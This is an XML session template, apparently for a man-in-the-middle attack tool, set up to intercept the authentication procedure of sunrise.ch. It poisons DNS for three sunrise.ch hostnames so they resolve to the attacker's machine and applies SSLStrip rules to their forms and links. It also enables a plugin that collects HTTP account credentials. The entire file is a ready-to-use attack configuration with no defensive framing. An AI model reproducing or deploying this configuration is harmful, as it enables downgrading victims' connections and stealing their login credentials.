	<SessionTemplate>
<Config name="authentication_sunrise" description="Intercepting Sunrise authentication procedure">
</Config>

<Plugins>

<Plugin name="DNS Poisoning" dirname="DNSPoisoning">

<ArrayOfDNSPoisonRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <DNSPoisonRecord>
    <HostName>www1.sunrise.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>sunrise.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
  <DNSPoisonRecord>
    <HostName>mip.sunrise.ch</HostName>
    <IPAddress>@LOCALIP</IPAddress>
  </DNSPoisonRecord>
</ArrayOfDNSPoisonRecord>
</Plugin>

<Plugin name="HTTP accounts" dirname="HTTPAccounts">

<PluginData xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Records />
</PluginData>
</Plugin>

<Plugin name="SSLStrip" dirname="SSLStrip">

<ArrayOfSSLStripRecord xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SSLStripRecord>
    <HostName>sunrise.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>sunrise.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www1.sunrise.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>www1.sunrise.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>mip.sunrise.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>a</Tag>
  </SSLStripRecord>
  <SSLStripRecord>
    <HostName>mip.sunrise.ch</HostName>
    <ContentType>text/html</ContentType>
    <Tag>form</Tag>
  </SSLStripRecord>
</ArrayOfSSLStripRecord>
</Plugin>


</Plugins>
</SessionTemplate>
